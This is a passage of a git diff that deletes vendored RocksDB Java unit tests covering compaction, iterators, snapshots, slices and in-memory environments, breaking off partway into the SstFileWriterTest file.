-             setNumLevels(4).
-             setWriteBufferSize(100 << 10).
-             setLevelZeroFileNumCompactionTrigger(3).
-             setTargetFileSizeBase(200 << 10).
-             setTargetFileSizeMultiplier(1).
-             setMaxBytesForLevelBase(500 << 10).
-             setMaxBytesForLevelMultiplier(1).
-             setDisableAutoCompactions(false)
-    ) {
-      final List<ColumnFamilyDescriptor> columnFamilyDescriptors =
-          Arrays.asList(
-              new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY),
-              new ColumnFamilyDescriptor("new_cf".getBytes(), new_cf_opts)
-          );
-
-      // open database
-      final List<ColumnFamilyHandle> columnFamilyHandles =
-          new ArrayList<>();
-      try (final RocksDB db = RocksDB.open(opt,
-          dbFolder.getRoot().getAbsolutePath(),
-          columnFamilyDescriptors,
-          columnFamilyHandles)) {
-        try {
-          // fill database with key/value pairs
-          byte[] b = new byte[10000];
-          for (int i = 0; i < 200; i++) {
-            rand.nextBytes(b);
-            db.put(columnFamilyHandles.get(1),
-                String.valueOf(i).getBytes(), b);
-          }
-          db.compactRange(columnFamilyHandles.get(1),
-              "0".getBytes(), "201".getBytes());
-        } finally {
-          for (final ColumnFamilyHandle handle : columnFamilyHandles) {
-            handle.close();
-          }
-        }
-      }
-    }
-  }
-
-  @Test
-  public void compactRangeWithKeysReduceColumnFamily()
-      throws RocksDBException {
-    try (final DBOptions opt = new DBOptions().
-        setCreateIfMissing(true).
-        setCreateMissingColumnFamilies(true);
-         final ColumnFamilyOptions new_cf_opts = new ColumnFamilyOptions().
-             setDisableAutoCompactions(true).
-             setCompactionStyle(CompactionStyle.LEVEL).
-             setNumLevels(4).
-             setWriteBufferSize(100 << 10).
-             setLevelZeroFileNumCompactionTrigger(3).
-             setTargetFileSizeBase(200 << 10).
-             setTargetFileSizeMultiplier(1).
-             setMaxBytesForLevelBase(500 << 10).
-             setMaxBytesForLevelMultiplier(1).
-             setDisableAutoCompactions(false)
-    ) {
-      final List<ColumnFamilyDescriptor> columnFamilyDescriptors =
-          Arrays.asList(
-              new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY),
-              new ColumnFamilyDescriptor("new_cf".getBytes(), new_cf_opts)
-          );
-
-      final List<ColumnFamilyHandle> columnFamilyHandles = new ArrayList<>();
-      // open database
-      try (final RocksDB db = RocksDB.open(opt,
-          dbFolder.getRoot().getAbsolutePath(),
-          columnFamilyDescriptors,
-          columnFamilyHandles)) {
-        try {
-          // fill database with key/value pairs
-          byte[] b = new byte[10000];
-          for (int i = 0; i < 200; i++) {
-            rand.nextBytes(b);
-            db.put(columnFamilyHandles.get(1),
-                String.valueOf(i).getBytes(), b);
-          }
-          db.compactRange(columnFamilyHandles.get(1), "0".getBytes(),
-              "201".getBytes(), true, -1, 0);
-        } finally {
-          for (final ColumnFamilyHandle handle : columnFamilyHandles) {
-            handle.close();
-          }
-        }
-      }
-    }
-  }
-
-  @Test
-  public void compactRangeToLevel()
-      throws RocksDBException, InterruptedException {
-    final int NUM_KEYS_PER_L0_FILE = 100;
-    final int KEY_SIZE = 20;
-    final int VALUE_SIZE = 300;
-    final int L0_FILE_SIZE =
-        NUM_KEYS_PER_L0_FILE * (KEY_SIZE + VALUE_SIZE);
-    final int NUM_L0_FILES = 10;
-    final int TEST_SCALE = 5;
-    final int KEY_INTERVAL = 100;
-    try (final Options opt = new Options().
-        setCreateIfMissing(true).
-        setCompactionStyle(CompactionStyle.LEVEL).
-        setNumLevels(5).
-        // a slightly bigger write buffer than L0 file
-        // so that we can ensure manual flush always
-        // go before background flush happens.
-            setWriteBufferSize(L0_FILE_SIZE * 2).
-        // Disable auto L0 -> L1 compaction
-            setLevelZeroFileNumCompactionTrigger(20).
-            setTargetFileSizeBase(L0_FILE_SIZE * 100).
-            setTargetFileSizeMultiplier(1).
-        // To disable auto compaction
-            setMaxBytesForLevelBase(NUM_L0_FILES * L0_FILE_SIZE * 100).
-            setMaxBytesForLevelMultiplier(2).
-            setDisableAutoCompactions(true);
-         final RocksDB db = RocksDB.open(opt,
-             dbFolder.getRoot().getAbsolutePath())
-    ) {
-      // fill database with key/value pairs
-      byte[] value = new byte[VALUE_SIZE];
-      int int_key = 0;
-      for (int round = 0; round < 5; ++round) {
-        int initial_key = int_key;
-        for (int f = 1; f <= NUM_L0_FILES; ++f) {
-          for (int i = 0; i < NUM_KEYS_PER_L0_FILE; ++i) {
-            int_key += KEY_INTERVAL;
-            rand.nextBytes(value);
-
-            db.put(String.format("%020d", int_key).getBytes(),
-                value);
-          }
-          db.flush(new FlushOptions().setWaitForFlush(true));
-          // Make sure we do create one more L0 files.
-          assertThat(
-              db.getProperty("rocksdb.num-files-at-level0")).
-              isEqualTo("" + f);
-        }
-
-        // Compact all L0 files we just created
-        db.compactRange(
-            String.format("%020d", initial_key).getBytes(),
-            String.format("%020d", int_key - 1).getBytes());
-        // Making sure there isn't any L0 files.
-        assertThat(
-            db.getProperty("rocksdb.num-files-at-level0")).
-            isEqualTo("0");
-        // Making sure there are some L1 files.
-        // Here we only use != 0 instead of a specific number
-        // as we don't want the test make any assumption on
-        // how compaction works.
-        assertThat(
-            db.getProperty("rocksdb.num-files-at-level1")).
-            isNotEqualTo("0");
-        // Because we only compacted those keys we issued
-        // in this round, there shouldn't be any L1 -> L2
-        // compaction.  So we expect zero L2 files here.
-        assertThat(
-            db.getProperty("rocksdb.num-files-at-level2")).
-            isEqualTo("0");
-      }
-    }
-  }
-
-  @Test
-  public void compactRangeToLevelColumnFamily()
-      throws RocksDBException {
-    final int NUM_KEYS_PER_L0_FILE = 100;
-    final int KEY_SIZE = 20;
-    final int VALUE_SIZE = 300;
-    final int L0_FILE_SIZE =
-        NUM_KEYS_PER_L0_FILE * (KEY_SIZE + VALUE_SIZE);
-    final int NUM_L0_FILES = 10;
-    final int TEST_SCALE = 5;
-    final int KEY_INTERVAL = 100;
-
-    try (final DBOptions opt = new DBOptions().
-        setCreateIfMissing(true).
-        setCreateMissingColumnFamilies(true);
-         final ColumnFamilyOptions new_cf_opts = new ColumnFamilyOptions().
-             setCompactionStyle(CompactionStyle.LEVEL).
-             setNumLevels(5).
-             // a slightly bigger write buffer than L0 file
-             // so that we can ensure manual flush always
-             // go before background flush happens.
-                 setWriteBufferSize(L0_FILE_SIZE * 2).
-             // Disable auto L0 -> L1 compaction
-                 setLevelZeroFileNumCompactionTrigger(20).
-                 setTargetFileSizeBase(L0_FILE_SIZE * 100).
-                 setTargetFileSizeMultiplier(1).
-             // To disable auto compaction
-                 setMaxBytesForLevelBase(NUM_L0_FILES * L0_FILE_SIZE * 100).
-                 setMaxBytesForLevelMultiplier(2).
-                 setDisableAutoCompactions(true)
-    ) {
-      final List<ColumnFamilyDescriptor> columnFamilyDescriptors =
-          Arrays.asList(
-              new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY),
-              new ColumnFamilyDescriptor("new_cf".getBytes(), new_cf_opts)
-          );
-
-      final List<ColumnFamilyHandle> columnFamilyHandles = new ArrayList<>();
-      // open database
-      try (final RocksDB db = RocksDB.open(opt,
-          dbFolder.getRoot().getAbsolutePath(),
-          columnFamilyDescriptors,
-          columnFamilyHandles)) {
-        try {
-          // fill database with key/value pairs
-          byte[] value = new byte[VALUE_SIZE];
-          int int_key = 0;
-          for (int round = 0; round < 5; ++round) {
-            int initial_key = int_key;
-            for (int f = 1; f <= NUM_L0_FILES; ++f) {
-              for (int i = 0; i < NUM_KEYS_PER_L0_FILE; ++i) {
-                int_key += KEY_INTERVAL;
-                rand.nextBytes(value);
-
-                db.put(columnFamilyHandles.get(1),
-                    String.format("%020d", int_key).getBytes(),
-                    value);
-              }
-              db.flush(new FlushOptions().setWaitForFlush(true),
-                  columnFamilyHandles.get(1));
-              // Make sure we do create one more L0 files.
-              assertThat(
-                  db.getProperty(columnFamilyHandles.get(1),
-                      "rocksdb.num-files-at-level0")).
-                  isEqualTo("" + f);
-            }
-
-            // Compact all L0 files we just created
-            db.compactRange(
-                columnFamilyHandles.get(1),
-                String.format("%020d", initial_key).getBytes(),
-                String.format("%020d", int_key - 1).getBytes());
-            // Making sure there isn't any L0 files.
-            assertThat(
-                db.getProperty(columnFamilyHandles.get(1),
-                    "rocksdb.num-files-at-level0")).
-                isEqualTo("0");
-            // Making sure there are some L1 files.
-            // Here we only use != 0 instead of a specific number
-            // as we don't want the test make any assumption on
-            // how compaction works.
-            assertThat(
-                db.getProperty(columnFamilyHandles.get(1),
-                    "rocksdb.num-files-at-level1")).
-                isNotEqualTo("0");
-            // Because we only compacted those keys we issued
-            // in this round, there shouldn't be any L1 -> L2
-            // compaction.  So we expect zero L2 files here.
-            assertThat(
-                db.getProperty(columnFamilyHandles.get(1),
-                    "rocksdb.num-files-at-level2")).
-                isEqualTo("0");
-          }
-        } finally {
-          for (final ColumnFamilyHandle handle : columnFamilyHandles) {
-            handle.close();
-          }
-        }
-      }
-    }
-  }
-
-  @Test
-  public void pauseContinueBackgroundWork() throws RocksDBException {
-    try (final Options options = new Options().setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())
-    ) {
-      db.pauseBackgroundWork();
-      db.continueBackgroundWork();
-      db.pauseBackgroundWork();
-      db.continueBackgroundWork();
-    }
-  }
-
-  @Test
-  public void enableDisableFileDeletions() throws RocksDBException {
-    try (final Options options = new Options().setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())
-    ) {
-      db.disableFileDeletions();
-      db.enableFileDeletions(false);
-      db.disableFileDeletions();
-      db.enableFileDeletions(true);
-    }
-  }
-
-  @Test
-  public void setOptions() throws RocksDBException {
-    try (final DBOptions options = new DBOptions()
-             .setCreateIfMissing(true)
-             .setCreateMissingColumnFamilies(true);
-         final ColumnFamilyOptions new_cf_opts = new ColumnFamilyOptions()
-             .setWriteBufferSize(4096)) {
-
-      final List<ColumnFamilyDescriptor> columnFamilyDescriptors =
-          Arrays.asList(
-              new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY),
-              new ColumnFamilyDescriptor("new_cf".getBytes(), new_cf_opts));
-
-      // open database
-      final List<ColumnFamilyHandle> columnFamilyHandles = new ArrayList<>();
-      try (final RocksDB db = RocksDB.open(options,
-          dbFolder.getRoot().getAbsolutePath(), columnFamilyDescriptors, columnFamilyHandles)) {
-        try {
-          final MutableColumnFamilyOptions mutableOptions =
-              MutableColumnFamilyOptions.builder()
-                  .setWriteBufferSize(2048)
-                  .build();
-
-          db.setOptions(columnFamilyHandles.get(1), mutableOptions);
-
-        } finally {
-          for (final ColumnFamilyHandle handle : columnFamilyHandles) {
-            handle.close();
-          }
-        }
-      }
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/RocksEnvTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/RocksEnvTest.java
deleted file mode 100644
index dfb7961..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/RocksEnvTest.java
+++ /dev/null
@@ -1,39 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Test;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class RocksEnvTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Test
-  public void rocksEnv() {
-    try (final Env rocksEnv = RocksEnv.getDefault()) {
-      rocksEnv.setBackgroundThreads(5);
-      // default rocksenv will always return zero for flush pool
-      // no matter what was set via setBackgroundThreads
-      assertThat(rocksEnv.getThreadPoolQueueLen(RocksEnv.FLUSH_POOL)).
-          isEqualTo(0);
-      rocksEnv.setBackgroundThreads(5, RocksEnv.FLUSH_POOL);
-      // default rocksenv will always return zero for flush pool
-      // no matter what was set via setBackgroundThreads
-      assertThat(rocksEnv.getThreadPoolQueueLen(RocksEnv.FLUSH_POOL)).
-          isEqualTo(0);
-      rocksEnv.setBackgroundThreads(5, RocksEnv.COMPACTION_POOL);
-      // default rocksenv will always return zero for compaction pool
-      // no matter what was set via setBackgroundThreads
-      assertThat(rocksEnv.getThreadPoolQueueLen(RocksEnv.COMPACTION_POOL)).
-          isEqualTo(0);
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/RocksIteratorTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/RocksIteratorTest.java
deleted file mode 100644
index 982dab4..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/RocksIteratorTest.java
+++ /dev/null
@@ -1,58 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class RocksIteratorTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public TemporaryFolder dbFolder = new TemporaryFolder();
-
-  @Test
-  public void rocksIterator() throws RocksDBException {
-    try (final Options options = new Options()
-        .setCreateIfMissing(true)
-        .setCreateMissingColumnFamilies(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())) {
-      db.put("key1".getBytes(), "value1".getBytes());
-      db.put("key2".getBytes(), "value2".getBytes());
-
-      try (final RocksIterator iterator = db.newIterator()) {
-        iterator.seekToFirst();
-        assertThat(iterator.isValid()).isTrue();
-        assertThat(iterator.key()).isEqualTo("key1".getBytes());
-        assertThat(iterator.value()).isEqualTo("value1".getBytes());
-        iterator.next();
-        assertThat(iterator.isValid()).isTrue();
-        assertThat(iterator.key()).isEqualTo("key2".getBytes());
-        assertThat(iterator.value()).isEqualTo("value2".getBytes());
-        iterator.next();
-        assertThat(iterator.isValid()).isFalse();
-        iterator.seekToLast();
-        iterator.prev();
-        assertThat(iterator.isValid()).isTrue();
-        assertThat(iterator.key()).isEqualTo("key1".getBytes());
-        assertThat(iterator.value()).isEqualTo("value1".getBytes());
-        iterator.seekToFirst();
-        iterator.seekToLast();
-        assertThat(iterator.isValid()).isTrue();
-        assertThat(iterator.key()).isEqualTo("key2".getBytes());
-        assertThat(iterator.value()).isEqualTo("value2".getBytes());
-        iterator.status();
-      }
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/RocksMemEnvTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/RocksMemEnvTest.java
deleted file mode 100644
index 04fae2e..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/RocksMemEnvTest.java
+++ /dev/null
@@ -1,148 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class RocksMemEnvTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Test
-  public void memEnvFillAndReopen() throws RocksDBException {
-
-    final byte[][] keys = {
-        "aaa".getBytes(),
-        "bbb".getBytes(),
-        "ccc".getBytes()
-    };
-
-    final byte[][] values = {
-        "foo".getBytes(),
-        "bar".getBytes(),
-        "baz".getBytes()
-    };
-
-    try (final Env env = new RocksMemEnv();
-         final Options options = new Options()
-             .setCreateIfMissing(true)
-             .setEnv(env);
-         final FlushOptions flushOptions = new FlushOptions()
-             .setWaitForFlush(true);
-    ) {
-      try (final RocksDB db = RocksDB.open(options, "dir/db")) {
-        // write key/value pairs using MemEnv
-        for (int i = 0; i < keys.length; i++) {
-          db.put(keys[i], values[i]);
-        }
-
-        // read key/value pairs using MemEnv
-        for (int i = 0; i < keys.length; i++) {
-          assertThat(db.get(keys[i])).isEqualTo(values[i]);
-        }
-
-        // Check iterator access
-        try (final RocksIterator iterator = db.newIterator()) {
-          iterator.seekToFirst();
-          for (int i = 0; i < keys.length; i++) {
-            assertThat(iterator.isValid()).isTrue();
-            assertThat(iterator.key()).isEqualTo(keys[i]);
-            assertThat(iterator.value()).isEqualTo(values[i]);
-            iterator.next();
-          }
-          // reached end of database
-          assertThat(iterator.isValid()).isFalse();
-        }
-
-        // flush
-        db.flush(flushOptions);
-
-        // read key/value pairs after flush using MemEnv
-        for (int i = 0; i < keys.length; i++) {
-          assertThat(db.get(keys[i])).isEqualTo(values[i]);
-        }
-      }
-
-      options.setCreateIfMissing(false);
-
-      // After reopen the values shall still be in the mem env.
-      // as long as the env is not freed.
-      try (final RocksDB db = RocksDB.open(options, "dir/db")) {
-        // read key/value pairs using MemEnv
-        for (int i = 0; i < keys.length; i++) {
-          assertThat(db.get(keys[i])).isEqualTo(values[i]);
-        }
-      }
-    }
-  }
-
-  @Test
-  public void multipleDatabaseInstances() throws RocksDBException {
-    // db - keys
-    final byte[][] keys = {
-        "aaa".getBytes(),
-        "bbb".getBytes(),
-        "ccc".getBytes()
-    };
-    // otherDb - keys
-    final byte[][] otherKeys = {
-        "111".getBytes(),
-        "222".getBytes(),
-        "333".getBytes()
-    };
-    // values
-    final byte[][] values = {
-        "foo".getBytes(),
-        "bar".getBytes(),
-        "baz".getBytes()
-    };
-
-    try (final Env env = new RocksMemEnv();
-         final Options options = new Options()
-             .setCreateIfMissing(true)
-             .setEnv(env);
-         final RocksDB db = RocksDB.open(options, "dir/db");
-         final RocksDB otherDb = RocksDB.open(options, "dir/otherDb")
-    ) {
-      // write key/value pairs using MemEnv
-      // to db and to otherDb.
-      for (int i = 0; i < keys.length; i++) {
-        db.put(keys[i], values[i]);
-        otherDb.put(otherKeys[i], values[i]);
-      }
-
-      // verify key/value pairs after flush using MemEnv
-      for (int i = 0; i < keys.length; i++) {
-        // verify db
-        assertThat(db.get(otherKeys[i])).isNull();
-        assertThat(db.get(keys[i])).isEqualTo(values[i]);
-
-        // verify otherDb
-        assertThat(otherDb.get(keys[i])).isNull();
-        assertThat(otherDb.get(otherKeys[i])).isEqualTo(values[i]);
-      }
-    }
-  }
-
-  @Test(expected = RocksDBException.class)
-  public void createIfMissingFalse() throws RocksDBException {
-    try (final Env env = new RocksMemEnv();
-         final Options options = new Options()
-             .setCreateIfMissing(false)
-             .setEnv(env);
-         final RocksDB db = RocksDB.open(options, "db/dir")) {
-      // shall throw an exception because db dir does not
-      // exist.
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/RocksMemoryResource.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/RocksMemoryResource.java
deleted file mode 100644
index 6fd1c7e..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/RocksMemoryResource.java
+++ /dev/null
@@ -1,24 +0,0 @@
-package org.rocksdb;
-
-import org.junit.rules.ExternalResource;
-
-/**
- * Resource to trigger garbage collection after each test
- * run.
- *
- * @deprecated Will be removed with the implementation of
- * {@link RocksObject#finalize()}
- */
-@Deprecated
-public class RocksMemoryResource extends ExternalResource {
-
-  static {
-    RocksDB.loadLibrary();
-  }
-
-  @Override
-  protected void after() {
-    System.gc();
-    System.runFinalization();
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/SliceTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/SliceTest.java
deleted file mode 100644
index 7ee656c..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/SliceTest.java
+++ /dev/null
@@ -1,80 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Test;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class SliceTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Test
-  public void slice() {
-    try (final Slice slice = new Slice("testSlice")) {
-      assertThat(slice.empty()).isFalse();
-      assertThat(slice.size()).isEqualTo(9);
-      assertThat(slice.data()).isEqualTo("testSlice".getBytes());
-    }
-
-    try (final Slice otherSlice = new Slice("otherSlice".getBytes())) {
-      assertThat(otherSlice.data()).isEqualTo("otherSlice".getBytes());
-    }
-
-    try (final Slice thirdSlice = new Slice("otherSlice".getBytes(), 5)) {
-      assertThat(thirdSlice.data()).isEqualTo("Slice".getBytes());
-    }
-  }
-
-  @Test
-  public void sliceClear() {
-    try (final Slice slice = new Slice("abc")) {
-      assertThat(slice.toString()).isEqualTo("abc");
-      slice.clear();
-      assertThat(slice.toString()).isEmpty();
-      slice.clear();  // make sure we don't double-free
-    }
-  }
-
-  @Test
-  public void sliceRemovePrefix() {
-    try (final Slice slice = new Slice("abc")) {
-      assertThat(slice.toString()).isEqualTo("abc");
-      slice.removePrefix(1);
-      assertThat(slice.toString()).isEqualTo("bc");
-    }
-  }
-
-  @Test
-  public void sliceEquals() {
-    try (final Slice slice = new Slice("abc");
-         final Slice slice2 = new Slice("abc")) {
-      assertThat(slice.equals(slice2)).isTrue();
-      assertThat(slice.hashCode() == slice2.hashCode()).isTrue();
-    }
-  }
-
-  @Test
-  public void sliceStartWith() {
-    try (final Slice slice = new Slice("matchpoint");
-         final Slice match = new Slice("mat");
-         final Slice noMatch = new Slice("nomatch")) {
-      assertThat(slice.startsWith(match)).isTrue();
-      assertThat(slice.startsWith(noMatch)).isFalse();
-    }
-  }
-
-  @Test
-  public void sliceToString() {
-    try (final Slice slice = new Slice("stringTest")) {
-      assertThat(slice.toString()).isEqualTo("stringTest");
-      assertThat(slice.toString(true)).isNotEqualTo("");
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/SnapshotTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/SnapshotTest.java
deleted file mode 100644
index de48c89..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/SnapshotTest.java
+++ /dev/null
@@ -1,169 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class SnapshotTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public TemporaryFolder dbFolder = new TemporaryFolder();
-
-  @Test
-  public void snapshots() throws RocksDBException {
-    try (final Options options = new Options().setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())) {
-      db.put("key".getBytes(), "value".getBytes());
-      // Get new Snapshot of database
-      try (final Snapshot snapshot = db.getSnapshot()) {
-        assertThat(snapshot.getSequenceNumber()).isGreaterThan(0);
-        assertThat(snapshot.getSequenceNumber()).isEqualTo(1);
-        try (final ReadOptions readOptions = new ReadOptions()) {
-          // set snapshot in ReadOptions
-          readOptions.setSnapshot(snapshot);
-
-          // retrieve key value pair
-          assertThat(new String(db.get("key".getBytes()))).
-              isEqualTo("value");
-          // retrieve key value pair created before
-          // the snapshot was made
-          assertThat(new String(db.get(readOptions,
-              "key".getBytes()))).isEqualTo("value");
-          // add new key/value pair
-          db.put("newkey".getBytes(), "newvalue".getBytes());
-          // using no snapshot the latest db entries
-          // will be taken into account
-          assertThat(new String(db.get("newkey".getBytes()))).
-              isEqualTo("newvalue");
-          // snapshopot was created before newkey
-          assertThat(db.get(readOptions, "newkey".getBytes())).
-              isNull();
-          // Retrieve snapshot from read options
-          try (final Snapshot sameSnapshot = readOptions.snapshot()) {
-            readOptions.setSnapshot(sameSnapshot);
-            // results must be the same with new Snapshot
-            // instance using the same native pointer
-            assertThat(new String(db.get(readOptions,
-                "key".getBytes()))).isEqualTo("value");
-            // update key value pair to newvalue
-            db.put("key".getBytes(), "newvalue".getBytes());
-            // read with previously created snapshot will
-            // read previous version of key value pair
-            assertThat(new String(db.get(readOptions,
-                "key".getBytes()))).isEqualTo("value");
-            // read for newkey using the snapshot must be
-            // null
-            assertThat(db.get(readOptions, "newkey".getBytes())).
-                isNull();
-            // setting null to snapshot in ReadOptions leads
-            // to no Snapshot being used.
-            readOptions.setSnapshot(null);
-            assertThat(new String(db.get(readOptions,
-                "newkey".getBytes()))).isEqualTo("newvalue");
-            // release Snapshot
-            db.releaseSnapshot(snapshot);
-          }
-        }
-      }
-    }
-  }
-
-  @Test
-  public void iteratorWithSnapshot() throws RocksDBException {
-    try (final Options options = new Options().setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())) {
-      db.put("key".getBytes(), "value".getBytes());
-
-      // Get new Snapshot of database
-      // set snapshot in ReadOptions
-      try (final Snapshot snapshot = db.getSnapshot();
-           final ReadOptions readOptions =
-               new ReadOptions().setSnapshot(snapshot)) {
-        db.put("key2".getBytes(), "value2".getBytes());
-
-        // iterate over current state of db
-        try (final RocksIterator iterator = db.newIterator()) {
-          iterator.seekToFirst();
-          assertThat(iterator.isValid()).isTrue();
-          assertThat(iterator.key()).isEqualTo("key".getBytes());
-          iterator.next();
-          assertThat(iterator.isValid()).isTrue();
-          assertThat(iterator.key()).isEqualTo("key2".getBytes());
-          iterator.next();
-          assertThat(iterator.isValid()).isFalse();
-        }
-
-        // iterate using a snapshot
-        try (final RocksIterator snapshotIterator =
-                 db.newIterator(readOptions)) {
-          snapshotIterator.seekToFirst();
-          assertThat(snapshotIterator.isValid()).isTrue();
-          assertThat(snapshotIterator.key()).isEqualTo("key".getBytes());
-          snapshotIterator.next();
-          assertThat(snapshotIterator.isValid()).isFalse();
-        }
-
-        // release Snapshot
-        db.releaseSnapshot(snapshot);
-      }
-    }
-  }
-
-  @Test
-  public void iteratorWithSnapshotOnColumnFamily() throws RocksDBException {
-    try (final Options options = new Options()
-        .setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())) {
-
-      db.put("key".getBytes(), "value".getBytes());
-
-      // Get new Snapshot of database
-      // set snapshot in ReadOptions
-      try (final Snapshot snapshot = db.getSnapshot();
-           final ReadOptions readOptions = new ReadOptions()
-               .setSnapshot(snapshot)) {
-        db.put("key2".getBytes(), "value2".getBytes());
-
-        // iterate over current state of column family
-        try (final RocksIterator iterator = db.newIterator(
-            db.getDefaultColumnFamily())) {
-          iterator.seekToFirst();
-          assertThat(iterator.isValid()).isTrue();
-          assertThat(iterator.key()).isEqualTo("key".getBytes());
-          iterator.next();
-          assertThat(iterator.isValid()).isTrue();
-          assertThat(iterator.key()).isEqualTo("key2".getBytes());
-          iterator.next();
-          assertThat(iterator.isValid()).isFalse();
-        }
-
-        // iterate using a snapshot on default column family
-        try (final RocksIterator snapshotIterator = db.newIterator(
-            db.getDefaultColumnFamily(), readOptions)) {
-          snapshotIterator.seekToFirst();
-          assertThat(snapshotIterator.isValid()).isTrue();
-          assertThat(snapshotIterator.key()).isEqualTo("key".getBytes());
-          snapshotIterator.next();
-          assertThat(snapshotIterator.isValid()).isFalse();
-
-          // release Snapshot
-          db.releaseSnapshot(snapshot);
-        }
-      }
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/SstFileWriterTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/SstFileWriterTest.java
deleted file mode 100644
index 6261210..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/SstFileWriterTest.java
+++ /dev/null
@@ -1,226 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-import org.rocksdb.util.BytewiseComparator;
-
-import java.io.File;
-import java.io.IOException;
-import java.util.ArrayList;
-import java.util.Arrays;
-import java.util.List;
-
-import static org.assertj.core.api.Assertions.assertThat;
-import static org.junit.Assert.fail;
-
-public class SstFileWriterTest {
-  private static final String SST_FILE_NAME = "test.sst";
-  private static final String DB_DIRECTORY_NAME = "test_db";
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource
-      = new RocksMemoryResource();
-
-  @Rule public TemporaryFolder parentFolder = new TemporaryFolder();
-
-  enum OpType { PUT, PUT_BYTES, MERGE, MERGE_BYTES, DELETE, DELETE_BYTES}
-
-  class KeyValueWithOp {
-    KeyValueWithOp(String key, String value, OpType opType) {
-      this.key = key;
-      this.value = value;
-      this.opType = opType;
-    }
-
-    String getKey() {
-      return key;
-    }
-
-    String getValue() {
-      return value;
-    }
-
-    OpType getOpType() {
-      return opType;
-    }
-
-    private String key;
-    private String value;
-    private OpType opType;
-  };
-
